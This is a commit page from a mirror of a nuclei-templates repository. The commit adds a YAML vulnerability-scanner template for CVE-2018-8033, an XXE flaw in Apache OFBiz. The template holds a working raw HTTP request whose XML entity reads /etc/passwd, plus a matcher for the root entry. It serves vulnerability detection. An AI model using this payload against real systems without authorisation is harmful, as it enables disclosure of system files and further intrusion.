daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #777 from pikpikcu/patch-29 

Add  (CVE-2018-8033) Apache OFBiz XXE
patch-1
PD-Team 2021-01-30 11:20:37 +05:30 committed by GitHub
parent 787f2fd31c 2c7a7a8b4d
commit 08119c0df6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
cves/2018/CVE-2018-8033.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2018-8033
info:
name: Apache OFBiz XXE
author: pikpikcu
severity: high
description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04
requests:
- raw:
- |
POST /webtools/control/xmlrpc HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en
Content-Type: application/xml
<?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://///etc/passwd">]><methodCall><methodName>&disclose;</methodName></methodCall>
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
- type: status
status:
- 200